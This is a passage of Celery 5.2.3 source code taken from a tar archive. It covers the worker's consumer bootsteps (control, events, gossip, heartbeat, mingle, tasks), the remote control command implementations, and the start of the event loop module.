conn.transport.register_with_event_loop(conn.connection, self.hub) return conn def connection_for_read(self, heartbeat=None): return self.ensure_connected( self.app.connection_for_read(heartbeat=heartbeat)) def connection_for_write(self, heartbeat=None): return self.ensure_connected( self.app.connection_for_write(heartbeat=heartbeat)) def ensure_connected(self, conn): # Callback called for each retry while the connection # can't be established. def _error_handler(exc, interval, next_step=CONNECTION_RETRY_STEP): if getattr(conn, 'alt', None) and interval == 0: next_step = CONNECTION_FAILOVER next_step = next_step.format( when=humanize_seconds(interval, 'in', ' '), retries=int(interval / 2), max_retries=self.app.conf.broker_connection_max_retries) error(CONNECTION_ERROR, conn.as_uri(), exc, next_step) # remember that the connection is lazy, it won't establish # until needed. if not self.app.conf.broker_connection_retry: # retry disabled, just call connect directly. conn.connect() return conn conn = conn.ensure_connection( _error_handler, self.app.conf.broker_connection_max_retries, callback=maybe_shutdown, ) return conn def _flush_events(self): if self.event_dispatcher: self.event_dispatcher.flush() def on_send_event_buffered(self): if self.hub: self.hub._ready.add(self._flush_events) def add_task_queue(self, queue, exchange=None, exchange_type=None, routing_key=None, **options): cset = self.task_consumer queues = self.app.amqp.queues # Must use in' here, as __missing__ will automatically # create queues when :setting:`task_create_missing_queues` is enabled. # (Issue #1079) if queue in queues: q = queues[queue] else: exchange = queue if exchange is None else exchange exchange_type = ('direct' if exchange_type is None else exchange_type) q = queues.select_add(queue, exchange=exchange, exchange_type=exchange_type, routing_key=routing_key, **options) if not cset.consuming_from(queue): cset.add_queue(q) cset.consume() info('Started consuming from %s', queue) def cancel_task_queue(self, queue): info('Canceling queue %s', queue) self.app.amqp.queues.deselect(queue) self.task_consumer.cancel_by_queue(queue) def apply_eta_task(self, task): """Method called by the timer to apply a task with an ETA/countdown.""" task_reserved(task) self.on_task_request(task) self.qos.decrement_eventually() def _message_report(self, body, message): return MESSAGE_REPORT.format(dump_body(message, body), safe_repr(message.content_type), safe_repr(message.content_encoding), safe_repr(message.delivery_info), safe_repr(message.headers)) def on_unknown_message(self, body, message): warn(UNKNOWN_FORMAT, self._message_report(body, message)) message.reject_log_error(logger, self.connection_errors) signals.task_rejected.send(sender=self, message=message, exc=None) def on_unknown_task(self, body, message, exc): error(UNKNOWN_TASK_ERROR, exc, dump_body(message, body), exc_info=True) try: id_, name = message.headers['id'], message.headers['task'] root_id = message.headers.get('root_id') except KeyError: # proto1 payload = message.payload id_, name = payload['id'], payload['task'] root_id = None request = Bunch( name=name, chord=None, root_id=root_id, correlation_id=message.properties.get('correlation_id'), reply_to=message.properties.get('reply_to'), errbacks=None, ) message.reject_log_error(logger, self.connection_errors) self.app.backend.mark_as_failure( id_, NotRegistered(name), request=request, ) if self.event_dispatcher: self.event_dispatcher.send( 'task-failed', uuid=id_, exception=f'NotRegistered({name!r})', ) signals.task_unknown.send( sender=self, message=message, exc=exc, name=name, id=id_, ) def on_invalid_task(self, body, message, exc): error(INVALID_TASK_ERROR, exc, dump_body(message, body), exc_info=True) message.reject_log_error(logger, self.connection_errors) signals.task_rejected.send(sender=self, message=message, exc=exc) def update_strategies(self): loader = self.app.loader for name, task in self.app.tasks.items(): self.strategies[name] = task.start_strategy(self.app, self) task.__trace__ = build_tracer(name, task, loader, self.hostname, app=self.app) def create_task_handler(self, promise=promise): strategies = self.strategies on_unknown_message = self.on_unknown_message on_unknown_task = self.on_unknown_task on_invalid_task = self.on_invalid_task callbacks = self.on_task_message call_soon = self.call_soon def on_task_received(message): # payload will only be set for v1 protocol, since v2 # will defer deserializing the message body to the pool. payload = None try: type_ = message.headers['task'] # protocol v2 except TypeError: return on_unknown_message(None, message) except KeyError: try: payload = message.decode() except Exception as exc: # pylint: disable=broad-except return self.on_decode_error(message, exc) try: type_, payload = payload['task'], payload # protocol v1 except (TypeError, KeyError): return on_unknown_message(payload, message) try: strategy = strategies[type_] except KeyError as exc: return on_unknown_task(None, message, exc) else: try: strategy( message, payload, promise(call_soon, (message.ack_log_error,)), promise(call_soon, (message.reject_log_error,)), callbacks, ) except (InvalidTaskError, ContentDisallowed) as exc: return on_invalid_task(payload, message, exc) except DecodeError as exc: return self.on_decode_error(message, exc) return on_task_received def __repr__(self): """``repr(self)``.""" return ''.format( self=self, state=self.blueprint.human_state(), ) class Evloop(bootsteps.StartStopStep): """Event loop service. Note: This is always started last. """ label = 'event loop' last = True def start(self, c): self.patch_all(c) c.loop(*c.loop_args()) def patch_all(self, c): c.qos._mutex = DummyLock() ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/celery/worker/consumer/control.py0000664000175000017500000000166200000000000021363 0ustar00asifasif00000000000000"""Worker Remote Control Bootstep. ``Control`` -> :mod:`celery.worker.pidbox` -> :mod:`kombu.pidbox`. The actual commands are implemented in :mod:`celery.worker.control`. """ from celery import bootsteps from celery.utils.log import get_logger from celery.worker import pidbox from .tasks import Tasks __all__ = ('Control',) logger = get_logger(__name__) class Control(bootsteps.StartStopStep): """Remote control command service.""" requires = (Tasks,) def __init__(self, c, **kwargs): self.is_green = c.pool is not None and c.pool.is_green self.box = (pidbox.gPidbox if self.is_green else pidbox.Pidbox)(c) self.start = self.box.start self.stop = self.box.stop self.shutdown = self.box.shutdown super().__init__(c, **kwargs) def include_if(self, c): return (c.app.conf.worker_enable_remote_control and c.conninfo.supports_exchange_type('fanout')) ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/celery/worker/consumer/events.py0000664000175000017500000000400600000000000021202 0ustar00asifasif00000000000000"""Worker Event Dispatcher Bootstep. ``Events`` -> :class:`celery.events.EventDispatcher`. """ from kombu.common import ignore_errors from celery import bootsteps from .connection import Connection __all__ = ('Events',) class Events(bootsteps.StartStopStep): """Service used for sending monitoring events.""" requires = (Connection,) def __init__(self, c, task_events=True, without_heartbeat=False, without_gossip=False, **kwargs): self.groups = None if task_events else ['worker'] self.send_events = ( task_events or not without_gossip or not without_heartbeat ) self.enabled = self.send_events c.event_dispatcher = None super().__init__(c, **kwargs) def start(self, c): # flush events sent while connection was down. prev = self._close(c) dis = c.event_dispatcher = c.app.events.Dispatcher( c.connection_for_write(), hostname=c.hostname, enabled=self.send_events, groups=self.groups, # we currently only buffer events when the event loop is enabled # XXX This excludes eventlet/gevent, which should actually buffer. buffer_group=['task'] if c.hub else None, on_send_buffered=c.on_send_event_buffered if c.hub else None, ) if prev: dis.extend_buffer(prev) dis.flush() def stop(self, c): pass def _close(self, c): if c.event_dispatcher: dispatcher = c.event_dispatcher # remember changes from remote control commands: self.groups = dispatcher.groups # close custom connection if dispatcher.connection: ignore_errors(c, dispatcher.connection.close) ignore_errors(c, dispatcher.close) c.event_dispatcher = None return dispatcher def shutdown(self, c): self._close(c) ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/celery/worker/consumer/gossip.py0000664000175000017500000001526100000000000021207 0ustar00asifasif00000000000000"""Worker <-> Worker communication Bootstep.""" from collections import defaultdict from functools import partial from heapq import heappush from operator import itemgetter from kombu import Consumer from kombu.asynchronous.semaphore import DummyLock from kombu.exceptions import ContentDisallowed, DecodeError from celery import bootsteps from celery.utils.log import get_logger from celery.utils.objects import Bunch from .mingle import Mingle __all__ = ('Gossip',) logger = get_logger(__name__) debug, info = logger.debug, logger.info class Gossip(bootsteps.ConsumerStep): """Bootstep consuming events from other workers. This keeps the logical clock value up to date. """ label = 'Gossip' requires = (Mingle,) _cons_stamp_fields = itemgetter( 'id', 'clock', 'hostname', 'pid', 'topic', 'action', 'cver', ) compatible_transports = {'amqp', 'redis'} def __init__(self, c, without_gossip=False, interval=5.0, heartbeat_interval=2.0, **kwargs): self.enabled = not without_gossip and self.compatible_transport(c.app) self.app = c.app c.gossip = self self.Receiver = c.app.events.Receiver self.hostname = c.hostname self.full_hostname = '.'.join([self.hostname, str(c.pid)]) self.on = Bunch( node_join=set(), node_leave=set(), node_lost=set(), ) self.timer = c.timer if self.enabled: self.state = c.app.events.State( on_node_join=self.on_node_join, on_node_leave=self.on_node_leave, max_tasks_in_memory=1, ) if c.hub: c._mutex = DummyLock() self.update_state = self.state.event self.interval = interval self.heartbeat_interval = heartbeat_interval self._tref = None self.consensus_requests = defaultdict(list) self.consensus_replies = {} self.event_handlers = { 'worker.elect': self.on_elect, 'worker.elect.ack': self.on_elect_ack, } self.clock = c.app.clock self.election_handlers = { 'task': self.call_task } super().__init__(c, **kwargs) def compatible_transport(self, app): with app.connection_for_read() as conn: return conn.transport.driver_type in self.compatible_transports def election(self, id, topic, action=None): self.consensus_replies[id] = [] self.dispatcher.send( 'worker-elect', id=id, topic=topic, action=action, cver=1, ) def call_task(self, task): try: self.app.signature(task).apply_async() except Exception as exc: # pylint: disable=broad-except logger.exception('Could not call task: %r', exc) def on_elect(self, event): try: (id_, clock, hostname, pid, topic, action, _) = self._cons_stamp_fields(event) except KeyError as exc: return logger.exception('election request missing field %s', exc) heappush( self.consensus_requests[id_], (clock, f'{hostname}.{pid}', topic, action), ) self.dispatcher.send('worker-elect-ack', id=id_) def start(self, c): super().start(c) self.dispatcher = c.event_dispatcher def on_elect_ack(self, event): id = event['id'] try: replies = self.consensus_replies[id] except KeyError: return # not for us alive_workers = set(self.state.alive_workers()) replies.append(event['hostname']) if len(replies) >= len(alive_workers): _, leader, topic, action = self.clock.sort_heap( self.consensus_requests[id], ) if leader == self.full_hostname: info('I won the election %r', id) try: handler = self.election_handlers[topic] except KeyError: logger.exception('Unknown election topic %r', topic) else: handler(action) else: info('node %s elected for %r', leader, id) self.consensus_requests.pop(id, None) self.consensus_replies.pop(id, None) def on_node_join(self, worker): debug('%s joined the party', worker.hostname) self._call_handlers(self.on.node_join, worker) def on_node_leave(self, worker): debug('%s left', worker.hostname) self._call_handlers(self.on.node_leave, worker) def on_node_lost(self, worker): info('missed heartbeat from %s', worker.hostname) self._call_handlers(self.on.node_lost, worker) def _call_handlers(self, handlers, *args, **kwargs): for handler in handlers: try: handler(*args, **kwargs) except Exception as exc: # pylint: disable=broad-except logger.exception( 'Ignored error from handler %r: %r', handler, exc) def register_timer(self): if self._tref is not None: self._tref.cancel() self._tref = self.timer.call_repeatedly(self.interval, self.periodic) def periodic(self): workers = self.state.workers dirty = set() for worker in workers.values(): if not worker.alive: dirty.add(worker) self.on_node_lost(worker) for worker in dirty: workers.pop(worker.hostname, None) def get_consumers(self, channel): self.register_timer() ev = self.Receiver(channel, routing_key='worker.#', queue_ttl=self.heartbeat_interval) return [Consumer( channel, queues=[ev.queue], on_message=partial(self.on_message, ev.event_from_message), no_ack=True )] def on_message(self, prepare, message): _type = message.delivery_info['routing_key'] # For redis when `fanout_patterns=False` (See Issue #1882) if _type.split('.', 1)[0] == 'task': return try: handler = self.event_handlers[_type] except KeyError: pass else: return handler(message.payload) # proto2: hostname in header; proto1: in body hostname = (message.headers.get('hostname') or message.payload['hostname']) if hostname != self.hostname: try: _, event = prepare(message.payload) self.update_state(event) except (DecodeError, ContentDisallowed, TypeError) as exc: logger.error(exc) else: self.clock.forward() ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/celery/worker/consumer/heart.py0000664000175000017500000000164200000000000021004 0ustar00asifasif00000000000000"""Worker Event Heartbeat Bootstep.""" from celery import bootsteps from celery.worker import heartbeat from .events import Events __all__ = ('Heart',) class Heart(bootsteps.StartStopStep): """Bootstep sending event heartbeats. This service sends a ``worker-heartbeat`` message every n seconds. Note: Not to be confused with AMQP protocol level heartbeats. """ requires = (Events,) def __init__(self, c, without_heartbeat=False, heartbeat_interval=None, **kwargs): self.enabled = not without_heartbeat self.heartbeat_interval = heartbeat_interval c.heart = None super().__init__(c, **kwargs) def start(self, c): c.heart = heartbeat.Heart( c.timer, c.event_dispatcher, self.heartbeat_interval, ) c.heart.start() def stop(self, c): c.heart = c.heart and c.heart.stop() shutdown = stop ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/celery/worker/consumer/mingle.py0000664000175000017500000000472700000000000021163 0ustar00asifasif00000000000000"""Worker <-> Worker Sync at startup (Bootstep).""" from celery import bootsteps from celery.utils.log import get_logger from .events import Events __all__ = ('Mingle',) logger = get_logger(__name__) debug, info, exception = logger.debug, logger.info, logger.exception class Mingle(bootsteps.StartStopStep): """Bootstep syncing state with neighbor workers. At startup, or upon consumer restart, this will: - Sync logical clocks. - Sync revoked tasks. """ label = 'Mingle' requires = (Events,) compatible_transports = {'amqp', 'redis'} def __init__(self, c, without_mingle=False, **kwargs): self.enabled = not without_mingle and self.compatible_transport(c.app) super().__init__( c, without_mingle=without_mingle, **kwargs) def compatible_transport(self, app): with app.connection_for_read() as conn: return conn.transport.driver_type in self.compatible_transports def start(self, c): self.sync(c) def sync(self, c): info('mingle: searching for neighbors') replies = self.send_hello(c) if replies: info('mingle: sync with %s nodes', len([reply for reply, value in replies.items() if value])) [self.on_node_reply(c, nodename, reply) for nodename, reply in replies.items() if reply] info('mingle: sync complete') else: info('mingle: all alone') def send_hello(self, c): inspect = c.app.control.inspect(timeout=1.0, connection=c.connection) our_revoked = c.controller.state.revoked replies = inspect.hello(c.hostname, our_revoked._data) or {} replies.pop(c.hostname, None) # delete my own response return replies def on_node_reply(self, c, nodename, reply): debug('mingle: processing reply from %s', nodename) try: self.sync_with_node(c, **reply) except MemoryError: raise except Exception as exc: # pylint: disable=broad-except exception('mingle: sync with %s failed: %r', nodename, exc) def sync_with_node(self, c, clock=None, revoked=None, **kwargs): self.on_clock_event(c, clock) self.on_revoked_received(c, revoked) def on_clock_event(self, c, clock): c.app.clock.adjust(clock) if clock else c.app.clock.forward() def on_revoked_received(self, c, revoked): if revoked: c.controller.state.revoked.update(revoked) ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/celery/worker/consumer/tasks.py0000664000175000017500000000364700000000000021035 0ustar00asifasif00000000000000"""Worker Task Consumer Bootstep.""" from kombu.common import QoS, ignore_errors from celery import bootsteps from celery.utils.log import get_logger from .mingle import Mingle __all__ = ('Tasks',) logger = get_logger(__name__) debug = logger.debug class Tasks(bootsteps.StartStopStep): """Bootstep starting the task message consumer.""" requires = (Mingle,) def __init__(self, c, **kwargs): c.task_consumer = c.qos = None super().__init__(c, **kwargs) def start(self, c): """Start task consumer.""" c.update_strategies() # - RabbitMQ 3.3 completely redefines how basic_qos works.. # This will detect if the new qos smenatics is in effect, # and if so make sure the 'apply_global' flag is set on qos updates. qos_global = not c.connection.qos_semantics_matches_spec # set initial prefetch count c.connection.default_channel.basic_qos( 0, c.initial_prefetch_count, qos_global, ) c.task_consumer = c.app.amqp.TaskConsumer( c.connection, on_decode_error=c.on_decode_error, ) def set_prefetch_count(prefetch_count): return c.task_consumer.qos( prefetch_count=prefetch_count, apply_global=qos_global, ) c.qos = QoS(set_prefetch_count, c.initial_prefetch_count) def stop(self, c): """Stop task consumer.""" if c.task_consumer: debug('Canceling task consumer...') ignore_errors(c, c.task_consumer.cancel) def shutdown(self, c): """Shutdown task consumer.""" if c.task_consumer: self.stop(c) debug('Closing consumer channel...') ignore_errors(c, c.task_consumer.close) c.task_consumer = None def info(self, c): """Return task consumer info.""" return {'prefetch_count': c.qos.value if c.qos else 'N/A'} ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/celery/worker/control.py0000664000175000017500000004076500000000000017537 0ustar00asifasif00000000000000"""Worker remote control command implementations.""" import io import tempfile from collections import UserDict, namedtuple from billiard.common import TERM_SIGNAME from kombu.utils.encoding import safe_repr from celery.exceptions import WorkerShutdown from celery.platforms import signals as _signals from celery.utils.functional import maybe_list from celery.utils.log import get_logger from celery.utils.serialization import jsonify, strtobool from celery.utils.time import rate from . import state as worker_state from .request import Request __all__ = ('Panel',) DEFAULT_TASK_INFO_ITEMS = ('exchange', 'routing_key', 'rate_limit') logger = get_logger(__name__) controller_info_t = namedtuple('controller_info_t', [ 'alias', 'type', 'visible', 'default_timeout', 'help', 'signature', 'args', 'variadic', ]) def ok(value): return {'ok': value} def nok(value): return {'error': value} class Panel(UserDict): """Global registry of remote control commands.""" data = {} # global dict. meta = {} # -"- @classmethod def register(cls, *args, **kwargs): if args: return cls._register(**kwargs)(*args) return cls._register(**kwargs) @classmethod def _register(cls, name=None, alias=None, type='control', visible=True, default_timeout=1.0, help=None, signature=None, args=None, variadic=None): def _inner(fun): control_name = name or fun.__name__ _help = help or (fun.__doc__ or '').strip().split('\n')[0] cls.data[control_name] = fun cls.meta[control_name] = controller_info_t( alias, type, visible, default_timeout, _help, signature, args, variadic) if alias: cls.data[alias] = fun return fun return _inner def control_command(**kwargs): return Panel.register(type='control', **kwargs) def inspect_command(**kwargs): return Panel.register(type='inspect', **kwargs) # -- App @inspect_command() def report(state): """Information about Celery installation for bug reports.""" return ok(state.app.bugreport()) @inspect_command( alias='dump_conf', # XXX < backwards compatible signature='[include_defaults=False]', args=[('with_defaults', strtobool)], ) def conf(state, with_defaults=False, **kwargs): """List configuration.""" return jsonify(state.app.conf.table(with_defaults=with_defaults), keyfilter=_wanted_config_key, unknown_type_filter=safe_repr) def _wanted_config_key(key): return isinstance(key, str) and not key.startswith('__') # -- Task @inspect_command( variadic='ids', signature='[id1 [id2 [... [idN]]]]', ) def query_task(state, ids, **kwargs): """Query for task information by id.""" return { req.id: (_state_of_task(req), req.info()) for req in _find_requests_by_id(maybe_list(ids)) } def _find_requests_by_id(ids, get_request=worker_state.requests.__getitem__): for task_id in ids: try: yield get_request(task_id) except KeyError: pass def _state_of_task(request, is_active=worker_state.active_requests.__contains__, is_reserved=worker_state.reserved_requests.__contains__): if is_active(request): return 'active' elif is_reserved(request): return 'reserved' return 'ready' @control_command( variadic='task_id', signature='[id1 [id2 [... [idN]]]]', ) def revoke(state, task_id, terminate=False, signal=None, **kwargs): """Revoke task by task id (or list of ids). Keyword Arguments: terminate (bool): Also terminate the process if the task is active. signal (str): Name of signal to use for terminate (e.g., ``KILL``). """ # pylint: disable=redefined-outer-name # XXX Note that this redefines `terminate`: # Outside of this scope that is a function. # supports list argument since 3.1 task_ids, task_id = set(maybe_list(task_id) or []), None size = len(task_ids) terminated = set() worker_state.revoked.update(task_ids) if terminate: signum = _signals.signum(signal or TERM_SIGNAME) for request in _find_requests_by_id(task_ids): if request.id not in terminated: terminated.add(request.id) logger.info('Terminating %s (%s)', request.id, signum) request.terminate(state.consumer.pool, signal=signum) if len(terminated) >= size: break if not terminated: return ok('terminate: tasks unknown') return ok('terminate: {}'.format(', '.join(terminated))) idstr = ', '.join(task_ids) logger.info('Tasks flagged as revoked: %s', idstr) return ok(f'tasks {idstr} flagged as revoked') @control_command( variadic='task_id', args=[('signal', str)], signature=' [id1 [id2 [... [idN]]]]' ) def terminate(state, signal, task_id, **kwargs): """Terminate task by task id (or list of ids).""" return revoke(state, task_id, terminate=True, signal=signal) @control_command( args=[('task_name', str), ('rate_limit', str)], signature=' ', ) def rate_limit(state, task_name, rate_limit, **kwargs): """Tell worker(s) to modify the rate limit for a task by type. See Also: :attr:`celery.app.task.Task.rate_limit`. Arguments: task_name (str): Type of task to set rate limit for. rate_limit (int, str): New rate limit. """ # pylint: disable=redefined-outer-name # XXX Note that this redefines `terminate`: # Outside of this scope that is a function. try: rate(rate_limit) except ValueError as exc: return nok(f'Invalid rate limit string: {exc!r}') try: state.app.tasks[task_name].rate_limit = rate_limit except KeyError: logger.error('Rate limit attempt for unknown task %s', task_name, exc_info=True) return nok('unknown task') state.consumer.reset_rate_limits() if not rate_limit: logger.info('Rate limits disabled for tasks of type %s', task_name) return ok('rate limit disabled successfully') logger.info('New rate limit for tasks of type %s: %s.', task_name, rate_limit) return ok('new rate limit set successfully') @control_command( args=[('task_name', str), ('soft', float), ('hard', float)], signature=' [hard_secs]', ) def time_limit(state, task_name=None, hard=None, soft=None, **kwargs): """Tell worker(s) to modify the time limit for task by type. Arguments: task_name (str): Name of task to change. hard (float): Hard time limit. soft (float): Soft time limit. """ try: task = state.app.tasks[task_name] except KeyError: logger.error('Change time limit attempt for unknown task %s', task_name, exc_info=True) return nok('unknown task') task.soft_time_limit = soft task.time_limit = hard logger.info('New time limits for tasks of type %s: soft=%s hard=%s', task_name, soft, hard) return ok('time limits set successfully') # -- Events @inspect_command() def clock(state, **kwargs): """Get current logical clock value.""" return {'clock': state.app.clock.value} @control_command() def election(state, id, topic, action=None, **kwargs): """Hold election. Arguments: id (str): Unique election id. topic (str): Election topic. action (str): Action to take for elected actor. """ if state.consumer.gossip: state.consumer.gossip.election(id, topic, action) @control_command() def enable_events(state): """Tell worker(s) to send task-related events.""" dispatcher = state.consumer.event_dispatcher if dispatcher.groups and 'task' not in dispatcher.groups: dispatcher.groups.add('task') logger.info('Events of group {task} enabled by remote.') return ok('task events enabled') return ok('task events already enabled') @control_command() def disable_events(state): """Tell worker(s) to stop sending task-related events.""" dispatcher = state.consumer.event_dispatcher if 'task' in dispatcher.groups: dispatcher.groups.discard('task') logger.info('Events of group {task} disabled by remote.') return ok('task events disabled') return ok('task events already disabled') @control_command() def heartbeat(state): """Tell worker(s) to send event heartbeat immediately.""" logger.debug('Heartbeat requested by remote.') dispatcher = state.consumer.event_dispatcher dispatcher.send('worker-heartbeat', freq=5, **worker_state.SOFTWARE_INFO) # -- Worker @inspect_command(visible=False) def hello(state, from_node, revoked=None, **kwargs): """Request mingle sync-data.""" # pylint: disable=redefined-outer-name # XXX Note that this redefines `revoked`: # Outside of this scope that is a function. if from_node != state.hostname: logger.info('sync with %s', from_node) if revoked: worker_state.revoked.update(revoked) # Do not send expired items to the other worker. worker_state.revoked.purge() return { 'revoked': worker_state.revoked._data, 'clock': state.app.clock.forward(), } @inspect_command(default_timeout=0.2) def ping(state, **kwargs): """Ping worker(s).""" return ok('pong') @inspect_command() def stats(state, **kwargs): """Request worker statistics/information.""" return state.consumer.controller.stats() @inspect_command(alias='dump_schedule') def scheduled(state, **kwargs): """List of currently scheduled ETA/countdown tasks.""" return list(_iter_schedule_requests(state.consumer.timer)) def _iter_schedule_requests(timer): for waiting in timer.schedule.queue: try: arg0 = waiting.entry.args[0] except (IndexError, TypeError): continue else: if isinstance(arg0, Request): yield { 'eta': arg0.eta.isoformat() if arg0.eta else None, 'priority': waiting.priority, 'request': arg0.info(), } @inspect_command(alias='dump_reserved') def reserved(state, **kwargs): """List of currently reserved tasks, not including scheduled/active.""" reserved_tasks = ( state.tset(worker_state.reserved_requests) - state.tset(worker_state.active_requests) ) if not reserved_tasks: return [] return [request.info() for request in reserved_tasks] @inspect_command(alias='dump_active') def active(state, safe=False, **kwargs): """List of tasks currently being executed.""" return [request.info(safe=safe) for request in state.tset(worker_state.active_requests)] @inspect_command(alias='dump_revoked') def revoked(state, **kwargs): """List of revoked task-ids.""" return list(worker_state.revoked) @inspect_command( alias='dump_tasks', variadic='taskinfoitems', signature='[attr1 [attr2 [... [attrN]]]]', ) def registered(state, taskinfoitems=None, builtins=False, **kwargs): """List of registered tasks. Arguments: taskinfoitems (Sequence[str]): List of task attributes to include. Defaults to ``exchange,routing_key,rate_limit``. builtins (bool): Also include built-in tasks. """ reg = state.app.tasks taskinfoitems = taskinfoitems or DEFAULT_TASK_INFO_ITEMS tasks = reg if builtins else ( task for task in reg if not task.startswith('celery.')) def _extract_info(task): fields = { field: str(getattr(task, field, None)) for field in taskinfoitems if getattr(task, field, None) is not None } if fields: info = ['='.join(f) for f in fields.items()] return '{} [{}]'.format(task.name, ' '.join(info)) return task.name return [_extract_info(reg[task]) for task in sorted(tasks)] # -- Debugging @inspect_command( default_timeout=60.0, args=[('type', str), ('num', int), ('max_depth', int)], signature='[object_type=Request] [num=200 [max_depth=10]]', ) def objgraph(state, num=200, max_depth=10, type='Request'): # pragma: no cover """Create graph of uncollected objects (memory-leak debugging). Arguments: num (int): Max number of objects to graph. max_depth (int): Traverse at most n levels deep. type (str): Name of object to graph. Default is ``"Request"``. """ try: import objgraph as _objgraph except ImportError: raise ImportError('Requires the objgraph library') logger.info('Dumping graph for type %r', type) with tempfile.NamedTemporaryFile(prefix='cobjg', suffix='.png', delete=False) as fh: objects = _objgraph.by_type(type)[:num] _objgraph.show_backrefs( objects, max_depth=max_depth, highlight=lambda v: v in objects, filename=fh.name, ) return {'filename': fh.name} @inspect_command() def memsample(state, **kwargs): """Sample current RSS memory usage.""" from celery.utils.debug import sample_mem return sample_mem() @inspect_command( args=[('samples', int)], signature='[n_samples=10]', ) def memdump(state, samples=10, **kwargs): # pragma: no cover """Dump statistics of previous memsample requests.""" from celery.utils import debug out = io.StringIO() debug.memdump(file=out) return out.getvalue() # -- Pool @control_command( args=[('n', int)], signature='[N=1]', ) def pool_grow(state, n=1, **kwargs): """Grow pool by n processes/threads.""" if state.consumer.controller.autoscaler: return nok("pool_grow is not supported with autoscale. Adjust autoscale range instead.") else: state.consumer.pool.grow(n) state.consumer._update_prefetch_count(n) return ok('pool will grow') @control_command( args=[('n', int)], signature='[N=1]', ) def pool_shrink(state, n=1, **kwargs): """Shrink pool by n processes/threads.""" if state.consumer.controller.autoscaler: return nok("pool_shrink is not supported with autoscale. Adjust autoscale range instead.") else: state.consumer.pool.shrink(n) state.consumer._update_prefetch_count(-n) return ok('pool will shrink') @control_command() def pool_restart(state, modules=None, reload=False, reloader=None, **kwargs): """Restart execution pool.""" if state.app.conf.worker_pool_restarts: state.consumer.controller.reload(modules, reload, reloader=reloader) return ok('reload started') else: raise ValueError('Pool restarts not enabled') @control_command( args=[('max', int), ('min', int)], signature='[max [min]]', ) def autoscale(state, max=None, min=None): """Modify autoscale settings.""" autoscaler = state.consumer.controller.autoscaler if autoscaler: max_, min_ = autoscaler.update(max, min) return ok(f'autoscale now max={max_} min={min_}') raise ValueError('Autoscale not enabled') @control_command() def shutdown(state, msg='Got shutdown from remote', **kwargs): """Shutdown worker(s).""" logger.warning(msg) raise WorkerShutdown(msg) # -- Queues @control_command( args=[ ('queue', str), ('exchange', str), ('exchange_type', str), ('routing_key', str), ], signature=' [exchange [type [routing_key]]]', ) def add_consumer(state, queue, exchange=None, exchange_type=None, routing_key=None, **options): """Tell worker(s) to consume from task queue by name.""" state.consumer.call_soon( state.consumer.add_task_queue, queue, exchange, exchange_type or 'direct', routing_key, **options) return ok(f'add consumer {queue}') @control_command( args=[('queue', str)], signature='', ) def cancel_consumer(state, queue, **_): """Tell worker(s) to stop consuming from task queue by name.""" state.consumer.call_soon( state.consumer.cancel_task_queue, queue, ) return ok(f'no longer consuming from {queue}') @inspect_command() def active_queues(state): """List the task queues a worker is currently consuming from.""" if state.consumer.task_consumer: return [dict(queue.as_dict(recurse=True)) for queue in state.consumer.task_consumer.queues] return [] ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/celery/worker/heartbeat.py0000664000175000017500000000407300000000000020006 0ustar00asifasif00000000000000"""Heartbeat service. This is the internal thread responsible for sending heartbeat events at regular intervals (may not be an actual thread). """ from celery.signals import heartbeat_sent from celery.utils.sysinfo import load_average from .state import SOFTWARE_INFO, active_requests, all_total_count __all__ = ('Heart',) class Heart: """Timer sending heartbeats at regular intervals. Arguments: timer (kombu.asynchronous.timer.Timer): Timer to use. eventer (celery.events.EventDispatcher): Event dispatcher to use. interval (float): Time in seconds between sending heartbeats. Default is 2 seconds. """ def __init__(self, timer, eventer, interval=None): self.timer = timer self.eventer = eventer self.interval = float(interval or 2.0) self.tref = None # Make event dispatcher start/stop us when enabled/disabled. self.eventer.on_enabled.add(self.start) self.eventer.on_disabled.add(self.stop) # Only send heartbeat_sent signal if it has receivers. self._send_sent_signal = ( heartbeat_sent.send if heartbeat_sent.receivers else None) def _send(self, event, retry=True): if self._send_sent_signal is not None: self._send_sent_signal(sender=self) return self.eventer.send(event, freq=self.interval, active=len(active_requests), processed=all_total_count[0], loadavg=load_average(), retry=retry, **SOFTWARE_INFO) def start(self): if self.eventer.enabled: self._send('worker-online') self.tref = self.timer.call_repeatedly( self.interval, self._send, ('worker-heartbeat',), ) def stop(self): if self.tref is not None: self.timer.cancel(self.tref) self.tref = None if self.eventer.enabled: self._send('worker-offline', retry=False) ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/celery/worker/loops.py0000664000175000017500000001052100000000000017176 0ustar00asifasif00000000000000"""The consumers highly-optimized inner loop.""" import errno import socket from celery import bootsteps from celery.exceptions import WorkerLostError from celery.utils.log import get_logger from . import state __all__ = ('asynloop', 'synloop') # pylint: disable=redefined-outer-name # We cache globals and attribute lookups, so disable this warning. logger = get_logger(__name__) def _quick_drain(connection, timeout=0.1): try: connection.drain_events(timeout=timeout) except Exception as exc: # pylint: disable=broad-except exc_errno = getattr(exc, 'errno', None) if exc_errno is not None and exc_errno != errno.EAGAIN: raise def _enable_amqheartbeats(timer, connection, rate=2.0): heartbeat_error = [None] if not connection: return heartbeat_error heartbeat = connection.get_heartbeat_interval() # negotiated if not (heartbeat and connection.supports_heartbeats): return heartbeat_error def tick(rate): try: connection.heartbeat_check(rate) except Exception as e: # heartbeat_error is passed by reference can be updated # no append here list should be fixed size=1 heartbeat_error[0] = e timer.call_repeatedly(heartbeat / rate, tick, (rate,)) return heartbeat_error def asynloop(obj, connection, consumer, blueprint, hub, qos, heartbeat, clock, hbrate=2.0): """Non-blocking event loop.""" RUN = bootsteps.RUN update_qos = qos.update errors = connection.connection_errors on_task_received = obj.create_task_handler() heartbeat_error = _enable_amqheartbeats(hub.timer, connection, rate=hbrate) consumer.on_message = on_task_received obj.controller.register_with_event_loop(hub) 